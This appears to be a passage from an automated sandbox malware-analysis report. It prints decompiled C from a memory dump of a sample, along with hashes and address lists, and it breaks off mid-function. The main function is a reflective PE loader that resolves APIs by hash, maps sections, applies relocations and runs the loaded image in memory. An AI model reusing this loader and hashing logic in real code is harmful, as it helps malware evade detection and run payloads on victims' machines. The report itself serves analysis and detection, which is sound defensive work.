0x003bde47
0x003bdb28
0x003bd9d3
0x003bdbb4
0x003bdbb9
0x003bdbc4
0x003bdbc4
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b80bc0ef750c546063ff099eaab4663a469d234785f02f077b4f6bdfd9e77d
Instruction ID: d27991eb2a69e4cdae761d8235fc0d7dd343d217d0417c23771219bf85028fe9
Opcode Fuzzy Hash: c9b80bc0ef750c546063ff099eaab4663a469d234785f02f077b4f6bdfd9e77d
Instruction Fuzzy Hash: 4022287160461287D7269F29C8416BAB7E2FFD4748F1AC52CEA858FA94FB70DC41C781

Uniqueness

Uniqueness Score: -1.00%

Function 003CFA10, Relevance: .6, Instructions: 569
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E003CFA10(signed short* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v84;
				intOrPtr _v104;
				intOrPtr _v108;
				signed short _v112;
				signed int _v116;
				signed short _t188;
				intOrPtr _t191;
				char _t193;
				void* _t194;
				void* _t198;
				intOrPtr _t205;
				signed int _t206;
				intOrPtr _t209;
				void* _t211;
				void* _t213;
				void* _t215;
				signed int _t218;
				void* _t219;
				void* _t221;
				void* _t222;
				void* _t224;
				void* _t226;
				void* _t228;
				signed int _t230;
				signed int _t231;
				unsigned int _t233;
				void* _t252;
				void* _t254;
				signed short* _t257;
				void* _t261;
				intOrPtr _t262;
				intOrPtr* _t264;
				signed int _t266;
				intOrPtr* _t267;
				signed int _t269;
				intOrPtr* _t270;
				intOrPtr* _t272;
				intOrPtr* _t277;
				intOrPtr* _t278;
				intOrPtr* _t280;
				void* _t282;
				intOrPtr _t284;
				signed int _t285;
				intOrPtr _t286;
				signed int _t288;
				intOrPtr _t289;
				intOrPtr _t293;
				intOrPtr _t295;
				unsigned int _t298;
				void* _t299;
				signed short _t305;
				intOrPtr _t309;
				intOrPtr _t311;
				intOrPtr _t312;
				intOrPtr* _t314;
				intOrPtr _t315;
				intOrPtr _t328;
				intOrPtr _t329;
				intOrPtr _t335;
				signed int _t343;
				intOrPtr _t350;
				void* _t358;
				signed int _t359;
				intOrPtr _t360;
				intOrPtr _t362;
				unsigned int _t364;
				unsigned int _t365;
				signed int _t367;
				void* _t370;
				intOrPtr* _t372;
				void* _t376;
				intOrPtr _t378;
				void* _t382;
				signed int _t394;
				void* _t396;
				void* _t401;

				_push(_t370);
				_t396 = (_t394 & 0xfffffff0) - 0x64;
				_t257 = __ecx;
				_t350 = __edx;
				if(( *__ecx & 0x0000ffff) == 0x5a4d) {
					_t188 = __ecx[0x1e];
					_v112 = _t188;
					if( *((intOrPtr*)(__ecx + _t188)) == 0x4550) {
						_t305 = _t188;
						_v44 =  *((intOrPtr*)( &(__ecx[0x1a]) + _t305));
						_v40 =  *((intOrPtr*)( &(__ecx[0x28]) + _t305));
						_t277 = E003B15C0(0x588ab3ea, 0x3b4caff7);
						if(_t277 != 0) {
							 *_t277(0xffffffff, _v44, 0,  &_v84, 0x1c, 0);
						}
						_t191 = _v68;
						if(_t191 == 0x1000) {
							L18:
							_v44 = 0;
							_t370 = 0x3000;
						} else {
							if(_t191 != 0x2000) {
								if(_t191 == 0x10000) {
									if(_v72 < _v40) {
										_v44 = 0;
									}
									_t370 = 0x3000;
								}
							} else {
								if(_v72 < _v40) {
									goto L18;
								} else {
									_t370 = 0x1000;
								}
							}
						}
						_t278 = E003B15C0(0x588ab3ea, 0xd8cc7390);
						if(_t278 != 0) {
							 *_t278(0xffffffff,  &_v44, 0,  &_v40, _t370, 4);
						}
						_t193 = _v44;
						_v36 = _t193;
						if(_t193 == 0) {
							_t194 = E003B15C0(0xa1310f65, 0xe541bc4f);
							if(_t194 == 0) {
								return 0;
							} else {
								_push(0xe);
								asm("int3");
								return _t194;
							}
						} else {
							_t372 = E003B0EB0(0x18);
							if(_t372 == 0) {
								_t280 = E003B15C0(0x588ab3ea, 0xd16c9225);
								if(_t280 != 0) {
									 *_t280(0xffffffff,  &_v44,  &_v40, 0x8000);
								}
								_t198 = E003B15C0(0xa1310f65, 0xe541bc4f);
								if(_t198 == 0) {
									return 0;
								} else {
									_push(0xe);
									asm("int3");
									return _t198;
								}
							} else {
								 *((intOrPtr*)(_t372 + 0xc)) = 0;
								 *((intOrPtr*)(_t372 + 8)) = 0;
								 *((char*)(_t372 + 0x10)) = 0;
								 *((intOrPtr*)(_t372 + 4)) = _v36;
								E003B0C10(_v36, _t257,  *((intOrPtr*)(_v112 + _t257 + 0x54)));
								_t401 = _t396 + 0xc;
								_t309 = _v36;
								_t205 =  *((intOrPtr*)(_t257 + 0x3c)) + _t309;
								 *_t372 = _t205;
								 *((intOrPtr*)(_t205 + 0x34)) = _t309;
								_v104 =  *((intOrPtr*)(_t372 + 4));
								_t311 =  *_t372;
								_t206 =  *(_t311 + 6) & 0x0000ffff;
								_t282 = _t311 + ( *(_t311 + 0x14) & 0x0000ffff) + 0x18;
								if(_t206 > 0) {
									_v116 = 0;
									_v32 = _t350;
									_v28 = _t372;
									_t382 = _t282;
									_t367 = _v116;
									do {
										_t301 =  *((intOrPtr*)(_t382 + 0x10));
										if( *((intOrPtr*)(_t382 + 0x10)) != 0) {
											_v116 =  *((intOrPtr*)(_t382 + 0xc)) + _v104;
											E003B0C10( *((intOrPtr*)(_t382 + 0xc)) + _v104,  *((intOrPtr*)(_t382 + 0x14)) + _t257, _t301);
											_t401 = _t401 + 0xc;
											 *((intOrPtr*)(_t382 + 0x18)) = _v116;
											_t311 =  *_v28;
											_t206 =  *(_t311 + 6) & 0x0000ffff;
										} else {
											_t303 =  *((intOrPtr*)(_v112 + _t257 + 0x38));
											if( *((intOrPtr*)(_v112 + _t257 + 0x38)) > 0) {
												 *((intOrPtr*)(_t382 + 0x18)) =  *((intOrPtr*)(_t382 + 0xc)) + _v104;
												E003B0B70( *((intOrPtr*)(_t382 + 0xc)) + _v104, 0, _t303);
												_t401 = _t401 + 0xc;
												_t311 =  *_v28;
												_t206 =  *(_t311 + 6) & 0x0000ffff;
											}
										}
										_t367 = _t367 + 1;
										_t382 = _t382 + 0x28;
									} while (_t367 < _t206);
									_t372 = _v28;
									_t350 = _v32;
									_v104 =  *((intOrPtr*)(_t372 + 4));
								}
								_t284 = _v36 -  *((intOrPtr*)(_v112 + _t257 + 0x34));
								_v108 = _t284;
								if(_t284 != 0 &&  *((intOrPtr*)(_t311 + 0xa4)) != 0) {
									_t272 = _v104 +  *((intOrPtr*)(_t311 + 0xa0));
									_t295 =  *_t272;
									if(_t295 > 0) {
										_v32 = _t350;
										_t230 = 0;
										_v28 = _t372;
										_t362 = _v104;
										do {
											_t378 =  *((intOrPtr*)(_t272 + 4));
											if(_t378 - 8 >> 1 != 0) {
												_t343 = _t230;
												_v112 = _t295 + _t362;
												while(1) {
													_t343 = _t343 + 1;
													_t231 =  *(_t272 + 4 + _t343 * 4) & 0x0000ffff;
													_t298 = _t231 >> 0xc;
													if(_t298 != 0 && _t298 == 3) {
														 *((intOrPtr*)((_t231 & 0x00000fff) + _v112)) =  *((intOrPtr*)((_t231 & 0x00000fff) + _v112)) + _v108;
														_t378 =  *((intOrPtr*)(_t272 + 4));
													}
													_t233 = _t378 - 8 >> 1;
													_t87 = _t343 - 1; // 0x0
													_t299 = _t343 + _t343;
													if(_t343 + _t87 >= _t233) {
														break;
													}
													_t364 =  *(_t272 + 6 + _t343 * 4) & 0x0000ffff;
													_v116 = _t364;
													_t365 = _t364 >> 0xc;
													if(_t365 != 0 && _t365 == 3) {
														 *((intOrPtr*)((_v116 & 0x00000fff) + _v112)) =  *((intOrPtr*)((_v116 & 0x00000fff) + _v112)) + _v108;
														_t378 =  *((intOrPtr*)(_t272 + 4));
														_t233 = _t378 - 8 >> 1;
													}
													if(_t299 < _t233) {
														continue;
													}
													break;
												}
												_t362 = _v104;
												_t230 = 0;
											}
											_t272 = _t272 + _t378;
											_t295 =  *_t272;
										} while (_t295 > 0);
										_t372 = _v28;
										_v104 =  *((intOrPtr*)(_t372 + 4));
										_t350 = _v32;
										_t311 =  *_t372;
									}
								}
								if( *((intOrPtr*)(_t311 + 0x84)) == 0) {
									L76:
									asm("movups xmm0, [0x3da330]");
									asm("movups xmm1, [0x3da340]");
									asm("movups [esp], xmm0");
									asm("movups [esp+0x10], xmm1");
									_t312 =  *_t372;
									_t285 =  *(_t312 + 6) & 0x0000ffff;
									_t261 = _t312 + ( *(_t312 + 0x14) & 0x0000ffff) + 0x18;
									if(_t285 <= 0) {
										L90:
										_t262 =  *((intOrPtr*)(_t312 + 0x28));
										if(_t262 == 0) {
											 *((intOrPtr*)(_t372 + 0x14)) = 0;
											goto L115;
										} else {
											_t264 = _t262 + _v36;
											 *((intOrPtr*)(_t372 + 0x14)) = _t264;
											if(_t350 == 0 || _t264 == 0) {
												L115:
												 *((char*)(_t372 + 0x10)) = 1;
												return _t372;
											} else {
												_t209 =  *_t264(_v36, 1, _a4);
												_t314 = _a8;
												if(_t314 != 0) {
													 *_t314 = _t209;
												}
												if(_t209 != 0) {
													goto L115;
												} else {
													if( *((char*)(_t372 + 0x10)) != 0) {
														_t267 =  *((intOrPtr*)(_t372 + 0x14));
														if(_t267 != 0) {
															 *_t267( *((intOrPtr*)(_t372 + 4)), 0, 0);
														}
													}
													_t286 =  *((intOrPtr*)(_t372 + 8));
													 *((char*)(_t372 + 0x10)) = 0;
													if(_t286 == 0) {
														L108:
														if( *((intOrPtr*)(_t372 + 4)) == 0) {
															L111:
															E003B0F30(_t372);
															_t211 = E003B15C0(0xa1310f65, 0xe541bc4f);
															if(_t211 == 0) {
																return 0;
															} else {
																_push(0x45a);
																asm("int3");
																return _t211;
															}
														} else {
															_t213 = E003B15C0(0xa1310f65, 0xf5e9a9a6);
															if(_t213 == 0) {
																goto L111;
															} else {
																_push(0x8000);
																_push(0);
																_push( *((intOrPtr*)(_t372 + 4)));
																asm("int3");
																return _t213;
															}
														}
													} else {
														_t315 =  *((intOrPtr*)(_t372 + 0xc));
														if(_t315 <= 0) {
															L107:
															E003B0F30(_t286);
															goto L108;
														} else {
															_t266 = 0;
															do {
																if( *((intOrPtr*)(_t286 + _t266 * 4)) == 0) {
																	goto L106;
																} else {
																	_t215 = E003B15C0(0xa1310f65, 0xe2d27ff4);
																	if(_t215 == 0) {
																		_t315 =  *((intOrPtr*)(_t372 + 0xc));
																		_t286 =  *((intOrPtr*)(_t372 + 8));
																		goto L106;
																	} else {
																		_push( *((intOrPtr*)( *((intOrPtr*)(_t372 + 8)) + _t266 * 4)));
																		asm("int3");
																		return _t215;
																	}
																}
																goto L124;
																L106:
																_t266 = _t266 + 1;
															} while (_t266 < _t315);
															goto L107;
														}
													}
												}
											}
										}
									} else {
										_v48 = _t312;
										_v28 = _t372;
										_t376 = 0;
										_v32 = _t350;
										_t218 = _t285;
										do {
											_t288 =  *(_t261 + 0x24);
											if((_t288 & 0x02000000) != 0) {
												goto L88;
											} else {
												_t358 =  !=  ?  *(_t401 + ((_t288 & 0x20000000) >> 0x19) + ((_t288 & 0x40000000) >> 0x1b) + (_t288 >> 0x1f) * 4) | 0x00000200 :  *(_t401 + ((_t288 & 0x20000000) >> 0x19) + ((_t288 & 0x40000000) >> 0x1b) + (_t288 >> 0x1f) * 4);
												_t328 =  *((intOrPtr*)(_t261 + 0x10));
												if(_t328 == 0) {
													goto L88;
												} else {
													if((_t288 & 0x00000040) == 0) {
														if((_t288 & 0x00000080) != 0) {
															_t328 =  *((intOrPtr*)(_v48 + 0x20));
														}
													} else {
														_t328 =  *((intOrPtr*)(_v48 + 0x24));
													}
													if(_t328 <= 0) {
														goto L88;
													} else {
														_v52 = _t328;
														_t219 = E003B15C0(0xa1310f65, 0x28bc3354);
														_t329 = _v60;
														if(_t219 == 0) {
															 *((intOrPtr*)(_t261 + 0x18)) = 0;
															_t289 =  *_v28;
															_v48 = _t289;
															_t218 =  *(_t289 + 6) & 0x0000ffff;
															goto L88;
														} else {
															_push( &_v56);
															_push(_t358);
															_push(_t329);
															_push( *((intOrPtr*)(_t261 + 0x18)));
															asm("int3");
															return _t219;
														}
													}
												}
											}
											goto L124;
											L88:
											_t376 = _t376 + 1;
											_t261 = _t261 + 0x28;
										} while (_t376 < _t218);
										_t312 = _v48;
										_t372 = _v28;
										_t350 = _v32;
										goto L90;
									}
								} else {
									_v116 = _v104 +  *((intOrPtr*)(_t311 + 0x80));
									if(E003B2F30(_v104 +  *((intOrPtr*)(_t311 + 0x80)), 0x14) == 0) {
										goto L76;
									} else {
										_v32 = _t350;
										_t359 = _v116;
										if( *((intOrPtr*)(_t359 + 0xc)) == 0) {
											_t350 = _v32;
											goto L76;
										} else {
											_t221 = E003B15C0(0xa1310f65, 0x77be1f6);
											if(_t221 == 0) {
												_t360 = _v32;
												_t222 = E003B15C0(0xa1310f65, 0xe541bc4f);
												if(_t222 == 0) {
													if(_t360 != 0 &&  *((char*)(_t372 + 0x10)) != 0) {
														_t270 =  *((intOrPtr*)(_t372 + 0x14));
														if(_t270 != 0) {
															 *_t270( *((intOrPtr*)(_t372 + 4)), 0, 0);
														}
													}
													_t293 =  *((intOrPtr*)(_t372 + 8));
													 *((char*)(_t372 + 0x10)) = 0;
													if(_t293 == 0) {
														L70:
														if( *((intOrPtr*)(_t372 + 4)) == 0) {
															L73:
															E003B0F30(_t372);
															_t224 = E003B15C0(0xa1310f65, 0xe541bc4f);
															if(_t224 == 0) {
																return 0;
															} else {
																_push(0x45a);
																asm("int3");
																return _t224;
															}
														} else {
															_t226 = E003B15C0(0xa1310f65, 0xf5e9a9a6);
															if(_t226 == 0) {
																goto L73;
															} else {
																_push(0x8000);
																_push(0);
																_push( *((intOrPtr*)(_t372 + 4)));
																asm("int3");
																return _t226;
															}
														}
													} else {
														_t335 =  *((intOrPtr*)(_t372 + 0xc));
														if(_t335 <= 0) {
															L69:
															E003B0F30(_t293);
															goto L70;
														} else {
															_t269 = 0;
															do {
																if( *((intOrPtr*)(_t293 + _t269 * 4)) == 0) {
																	goto L68;
																} else {
																	_t228 = E003B15C0(0xa1310f65, 0xe2d27ff4);
																	if(_t228 == 0) {
																		_t335 =  *((intOrPtr*)(_t372 + 0xc));
																		_t293 =  *((intOrPtr*)(_t372 + 8));
																		goto L68;
																	} else {
																		_push( *((intOrPtr*)( *((intOrPtr*)(_t372 + 8)) + _t269 * 4)));
																		asm("int3");
																		return _t228;
																	}
																}
																goto L124;
																L68:
																_t269 = _t269 + 1;
															} while (_t269 < _t335);
															goto L69;
														}
													}
												} else {
													_push(0x7e);
													asm("int3");
													return _t222;
												}
											} else {
												_push(_v104 +  *((intOrPtr*)(_t359 + 0xc)));
												asm("int3");
												return _t221;
											}
										}
									}
								}
							}
						}
					} else {
						_t252 = E003B15C0(0xa1310f65, 0xe541bc4f);
						if(_t252 == 0) {
							return 0;
						} else {
							_push(0xc1);
							asm("int3");
							return _t252;
						}
					}
				} else {
					_t254 = E003B15C0(0xa1310f65, 0xe541bc4f);
					if(_t254 == 0) {
						return 0;
					} else {
						_push(0xc1);
						asm("int3");
						return _t254;
					}
				}
				L124:
			}

0x003cfa16
0x003cfa19
0x003cfa1c
0x003cfa1e
0x003cfa28
0x003cfa52
0x003cfa55
0x003cfa60
0x003cfa8a
0x003cfa90
0x003cfa98
0x003cfaab
0x003cfaaf
0x003cfac2
0x003cfac2
0x003cfac4
0x003cfacd
0x003cfb07
0x003cfb07
0x003cfb0f
0x003cfacf
0x003cfad4
0x003cfaec
0x003cfaf6
0x003cfaf8
0x003cfaf8
0x003cfb00
0x003cfb00
0x003cfad6
0x003cfade
0x00000000
0x003cfae0
0x003cfae0
0x003cfae0
0x003cfade
0x003cfad4
0x003cfb23
0x003cfb27
0x003cfb3a
0x003cfb3a
0x003cfb3c
0x003cfb40
0x003cfb46
0x003d0231
0x003d0238
0x003d0249
0x003d023a
0x003d023a
0x003d023c
0x003d023d
0x003d023d
0x003cfb4c
0x003cfb56
0x003cfb5a
0x003d01e9
0x003d01ed
0x003d0200
0x003d0200
0x003d020c
0x003d0213
0x003d0224
0x003d0215
0x003d0215
0x003d0217
0x003d0218
0x003d0218
0x003cfb60
0x003cfb62
0x003cfb65
0x003cfb68
0x003cfb73
0x003cfb7c
0x003cfb81
0x003cfb87
0x003cfb8b
0x003cfb8d
0x003cfb8f
0x003cfb95
0x003cfb99
0x003cfb9f
0x003cfba3
0x003cfba9
0x003cfbaf
0x003cfbb6
0x003cfbba
0x003cfbbe
0x003cfbc0
0x003cfbc3
0x003cfbc3
0x003cfbc8
0x003cfc07
0x003cfc0b
0x003cfc14
0x003cfc1b
0x003cfc1e
0x003cfc20
0x003cfbca
0x003cfbce
0x003cfbd4
0x003cfbe1
0x003cfbe4
0x003cfbe9
0x003cfbf0
0x003cfbf2
0x003cfbf2
0x003cfbd4
0x003cfc24
0x003cfc25
0x003cfc28
0x003cfc2c
0x003cfc33
0x003cfc37
0x003cfc37
0x003cfc43
0x003cfc47
0x003cfc4b
0x003cfc62
0x003cfc68
0x003cfc6c
0x003cfc72
0x003cfc76
0x003cfc78
0x003cfc7c
0x003cfc80
0x003cfc80
0x003cfc88
0x003cfc8c
0x003cfc8e
0x003cfc92
0x003cfc92
0x003cfc93
0x003cfc9a
0x003cfc9d
0x003cfcb1
0x003cfcb4
0x003cfcb4
0x003cfcba
0x003cfcbc
0x003cfcc0
0x003cfcc5
0x00000000
0x00000000
0x003cfcc7
0x003cfccc
0x003cfccf
0x003cfcd2
0x003cfcea
0x003cfced
0x003cfcf3
0x003cfcf3
0x003cfcf7
0x00000000
0x00000000
0x00000000
0x003cfcf7
0x003cfcfb
0x003cfcff
0x003cfcff
0x003cfd01
0x003cfd03
0x003cfd05
0x003cfd0d
0x003cfd14
0x003cfd18
0x003cfd1c
0x003cfd1c
0x003cfc6c
0x003cfd25
0x003cff7a
0x003cff7a
0x003cff81
0x003cff88
0x003cff8c
0x003cff91
0x003cff97
0x003cff9b
0x003cffa1
0x003d0078
0x003d0078
0x003d007d
0x003d0167
0x00000000
0x003d0083
0x003d0085
0x003d0089
0x003d008e
0x003d016e
0x003d016e
0x003d017d
0x003d009c
0x003d00a5
0x003d00a7
0x003d00ac
0x003d00ae
0x003d00ae
0x003d00b2
0x00000000
0x003d00b8
0x003d00bc
0x003d00be
0x003d00c3
0x003d00cc
0x003d00cc
0x003d00c3
0x003d00ce
0x003d00d1
0x003d00d7
0x003d0113
0x003d0117
0x003d0138
0x003d013a
0x003d0149
0x003d0150
0x003d0164
0x003d0152
0x003d0152
0x003d0157
0x003d0158
0x003d0158
0x003d0119
0x003d0123
0x003d012a
0x00000000
0x003d012c
0x003d012c
0x003d0131
0x003d0133
0x003d0136
0x003d0137
0x003d0137
0x003d012a
0x003d00d9
0x003d00d9
0x003d00de
0x003d010e
0x003d010e
0x00000000
0x003d00e0
0x003d00e0
0x003d00e2
0x003d00e6
0x00000000
0x003d00e8
0x003d00f2
0x003d00f9
0x003d0103
0x003d0106
0x00000000
0x003d00fb
0x003d00fe
0x003d0101
0x003d0102
0x003d0102
0x003d00f9
0x00000000
0x003d0109
0x003d0109
0x003d010a
0x00000000
0x003d00e2
0x003d00de
0x003d00d7
0x003d00b2
0x003d008e
0x003cffa7
0x003cffa9
0x003cffad
0x003cffb1
0x003cffb3
0x003cffb7
0x003cffb9
0x003cffb9
0x003cffc2
0x00000000
0x003cffc8
0x003cfff9
0x003cfffc
0x003d0001
0x00000000
0x003d0003
0x003d0006
0x003d0017
0x003d001d
0x003d001d
0x003d0008
0x003d000c
0x003d000c
0x003d0022
0x00000000
0x003d0024
0x003d002e
0x003d0032
0x003d0037
0x003d003d
0x003d004f
0x003d0056
0x003d0058
0x003d005c
0x00000000
0x003d003f
0x003d0043
0x003d0044
0x003d0045
0x003d0046
0x003d0049
0x003d004a
0x003d004a
0x003d003d
0x003d0022
0x003d0001
0x00000000
0x003d0060
0x003d0060
0x003d0061
0x003d0064
0x003d006c
0x003d0070
0x003d0074
0x00000000
0x003d0074
0x003cfd2b
0x003cfd3a
0x003cfd44
0x00000000
0x003cfd4a
0x003cfd4a
0x003cfd4e
0x003cfd55
0x003cfe5e
0x00000000
0x003cfd5b
0x003cfd65
0x003cfd6c
0x003cfeaa
0x003cfeb8
0x003cfebf
0x003cfec9
0x003cfed1
0x003cfed6
0x003cfedf
0x003cfedf
0x003cfed6
0x003cfee1
0x003cfee4
0x003cfeea
0x003cff26
0x003cff2a
0x003cff4b
0x003cff4d
0x003cff5c
0x003cff63
0x003cff77
0x003cff65
0x003cff65
0x003cff6a
0x003cff6b
0x003cff6b
0x003cff2c
0x003cff36
0x003cff3d
0x00000000
0x003cff3f
0x003cff3f
0x003cff44
0x003cff46
0x003cff49
0x003cff4a
0x003cff4a
0x003cff3d
0x003cfeec
0x003cfeec
0x003cfef1
0x003cff21
0x003cff21
0x00000000
0x003cfef3
0x003cfef3
0x003cfef5
0x003cfef9
0x00000000
0x003cfefb
0x003cff05
0x003cff0c
0x003cff16
0x003cff19
0x00000000
0x003cff0e
0x003cff11
0x003cff14
0x003cff15
0x003cff15
0x003cff0c
0x00000000
0x003cff1c
0x003cff1c
0x003cff1d
0x00000000
0x003cfef5
0x003cfef1
0x003cfec1
0x003cfec1
0x003cfec3
0x003cfec4
0x003cfec4
0x003cfd72
0x003cfd79
0x003cfd7a
0x003cfd7b
0x003cfd7b
0x003cfd6c
0x003cfd55
0x003cfd44
0x003cfd25
0x003cfb5a
0x003cfa62
0x003cfa6c
0x003cfa73
0x003cfa87
0x003cfa75
0x003cfa75
0x003cfa7a
0x003cfa7b
0x003cfa7b
0x003cfa73
0x003cfa2a
0x003cfa34
0x003cfa3b
0x003cfa4f
0x003cfa3d
0x003cfa3d
0x003cfa42
0x003cfa43
0x003cfa43
0x003cfa3b
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05632d5a67070a8ee539f7319f14663351726324e096c589176e3f4ffe53d43f
Instruction ID: e0eb4e2e6db65a89ceab138590c3ba82ef795a576c9385a6891b897b2c163fd8
Opcode Fuzzy Hash: 05632d5a67070a8ee539f7319f14663351726324e096c589176e3f4ffe53d43f
Instruction Fuzzy Hash: 6212BD356043019FD72ACF29C880B6BB7E6AFC5714F19892DEA858B745E770EC84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003BBF50, Relevance: .5, Instructions: 542
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E003BBF50(unsigned int* __ecx, unsigned int* _a4, unsigned int _a8) {
				signed int _v28;
				unsigned int _v32;
				unsigned int _v36;
				signed int _v40;
				unsigned int _v44;
				unsigned int _v48;
				unsigned int _v52;
				intOrPtr* _t160;
				signed short* _t163;
				signed int** _t164;
				unsigned int _t166;
				unsigned int _t170;
				unsigned int* _t172;
				unsigned int _t179;
				unsigned int _t182;
				unsigned int _t184;
				signed int _t186;
				signed int _t187;
				intOrPtr* _t188;
				unsigned int _t191;
				unsigned int* _t193;
				unsigned int _t196;
				unsigned int _t202;
				signed int _t203;
				unsigned int* _t208;
				void* _t209;
				unsigned int _t212;
				signed int _t213;
				unsigned int _t219;
				signed int _t224;
				unsigned int _t228;
				signed int _t237;
				unsigned int _t239;
				unsigned int _t240;
				unsigned int _t251;
				unsigned int _t252;
				signed int _t255;
				unsigned int _t256;
				unsigned int _t258;
				unsigned int _t263;
				void* _t264;
				signed int _t265;
				unsigned int _t266;
				unsigned int _t267;
				unsigned int _t268;
				unsigned int _t269;
				unsigned int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				signed int _t277;
				signed int _t279;
				unsigned int _t281;
				unsigned int _t282;
				unsigned int _t285;
				signed int _t286;
				signed int _t293;
				unsigned int _t296;
				signed int _t297;
				void* _t298;
				signed int _t299;
				unsigned int _t300;
				unsigned int _t303;
				unsigned int _t307;
				signed short* _t313;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				unsigned int _t322;
				unsigned int _t323;
				unsigned int _t324;
				unsigned int _t326;
				unsigned int _t327;
				unsigned int _t328;
				signed int* _t330;
				unsigned int _t337;
				signed int _t339;
				unsigned int _t341;
				unsigned int _t344;
				signed int _t347;
				signed int _t351;
				void* _t353;
				void* _t354;
				void* _t356;

				_t353 = (_t351 & 0xfffffff0) - 0x24;
				_t313 = _a8;
				if(_t313 == 0) {
					L2:
					_t160 = _a4;
					_t217 = 0;
					_push(0x80);
					 *_t160 = 0;
					 *((intOrPtr*)(_t160 + 4)) = 0;
					_t330 = E003B1030();
					_t354 = _t353 + 4;
					_t163 =  *_a4;
					if(_t163 == 0) {
						 *_t330 = 0;
					} else {
						if(_t330 != 0) {
							_t271 =  *_t163 & 0x0000ffff;
							 *_t330 = _t271;
							if(_t271 != 0) {
								while(1) {
									_t217 = _t217 + 1;
									_t272 =  *(_t163 + _t217 * 4 - 2) & 0x0000ffff;
									 *(_t330 + _t217 * 4 - 2) = _t272;
									if(_t272 == 0) {
										goto L7;
									}
									_t273 =  *(_t163 + _t217 * 4) & 0x0000ffff;
									_t330[_t217] = _t273;
									if(_t273 != 0) {
										continue;
									}
									goto L7;
								}
							}
						}
						L7:
						_push(2);
						_push(_t163);
						E003B10B0();
						_t354 = _t354 + 8;
					}
					_t164 = _a4;
					_t164[1] = 0x40;
					 *_t164 = _t330;
					return _t164;
				} else {
					_t274 =  *_t313 & 0x0000ffff;
					if(_t274 != 0) {
						_t166 =  *__ecx;
						__eflags = _t166;
						if(_t166 == 0) {
							L15:
							_t275 = _a4;
							_push(0x80);
							 *_t275 = 0;
							 *((intOrPtr*)(_t275 + 4)) = 0;
							_t219 = E003B1030();
							_t356 = _t353 + 4;
							_t170 =  *_a4;
							__eflags = _t170;
							if(_t170 == 0) {
								__eflags = 0;
								 *_t219 = 0;
							} else {
								__eflags = _t219;
								if(_t219 != 0) {
									_t276 =  *_t170 & 0x0000ffff;
									 *_t219 = _t276;
									__eflags = _t276;
									if(_t276 != 0) {
										_t277 = 0;
										__eflags = 0;
										while(1) {
											_t277 = _t277 + 1;
											_t251 =  *(_t170 + _t277 * 4 - 2) & 0x0000ffff;
											 *(_t219 + _t277 * 4 - 2) = _t251;
											__eflags = _t251;
											if(_t251 == 0) {
												goto L21;
											}
											_t252 =  *(_t170 + _t277 * 4) & 0x0000ffff;
											 *(_t219 + _t277 * 4) = _t252;
											__eflags = _t252;
											if(_t252 != 0) {
												continue;
											}
											goto L21;
										}
									}
								}
								L21:
								_push(2);
								_push(_t170);
								E003B10B0();
								_t356 = _t356 + 8;
							}
							_t172 = _a4;
							_t172[1] = 0x40;
							 *_t172 = _t219;
							return _t172;
						} else {
							__eflags =  *_t166 & 0x0000ffff;
							if(( *_t166 & 0x0000ffff) == 0) {
								goto L15;
							} else {
								__eflags = _t274 - 0x41 - 0x19;
								_t278 =  <=  ? _t274 + 0x20 : _t274;
								_t255 = 0;
								__eflags = 0;
								_t279 = ( <=  ? _t274 + 0x20 : _t274) & 0x0000ffff;
								_v40 = _t279;
								while(1) {
									_t316 =  *(_t166 + _t255 * 2) & 0x0000ffff;
									_t22 = _t316 - 0x41; // -65
									__eflags = _t22 - 0x19;
									_t23 = _t316 + 0x20; // 0x20
									_t317 =  <=  ? _t23 :  *(_t166 + _t255 * 2) & 0x0000ffff;
									__eflags = ( <=  ? _t23 :  *(_t166 + _t255 * 2) & 0x0000ffff) - _t279;
									if(( <=  ? _t23 :  *(_t166 + _t255 * 2) & 0x0000ffff) == _t279) {
										break;
									}
									_t255 = _t255 + 1;
									__eflags =  *(_t166 + _t255 * 2) & 0x0000ffff;
									if(( *(_t166 + _t255 * 2) & 0x0000ffff) != 0) {
										continue;
									} else {
										goto L15;
									}
									goto L137;
								}
								_t318 = _a8;
								_t256 = _t166 + _t255 * 2;
								__eflags = _t256;
								if(_t256 == 0) {
									goto L15;
								} else {
									_t224 = _t318 & 0x0000000f;
									asm("pxor xmm0, xmm0");
									_t281 = _t224 & 0x00000001;
									_t337 =  ~_t224 + 0x10 >> 1;
									_v28 = _t166;
									while(1) {
										_t319 = _t224;
										__eflags = _t224;
										if(_t224 == 0) {
											goto L33;
										}
										_t182 = 0;
										__eflags = _t281;
										if(_t281 != 0) {
											L37:
											_v32 = _t256;
											_t328 = _a8;
											while(1) {
												__eflags =  *(_t328 + _t182 * 2) & 0x0000ffff;
												if(( *(_t328 + _t182 * 2) & 0x0000ffff) == 0) {
													break;
												}
												_t182 = _t182 + 1;
												__eflags = _t182 - 0x7fffffff;
												if(_t182 < 0x7fffffff) {
													continue;
												} else {
													_t258 = _v32;
													goto L41;
												}
												goto L137;
											}
											_t258 = _v32;
											goto L121;
										} else {
											_v32 = _t256;
											_t319 = _t337;
											_v36 = _t281;
											_t270 = _a8;
											while(1) {
												__eflags =  *(_t270 + _t182 * 2) & 0x0000ffff;
												if(( *(_t270 + _t182 * 2) & 0x0000ffff) == 0) {
													break;
												}
												_t182 = _t182 + 1;
												__eflags = _t182 - _t337;
												if(_t182 < _t337) {
													continue;
												} else {
													_t281 = _v36;
													_t256 = _v32;
													goto L33;
												}
												goto L137;
											}
											_t282 = _v36;
											_t258 = _v32;
											L121:
											__eflags = _t182;
											if(__eflags == 0) {
												L41:
												_t182 = 0x7fffffff;
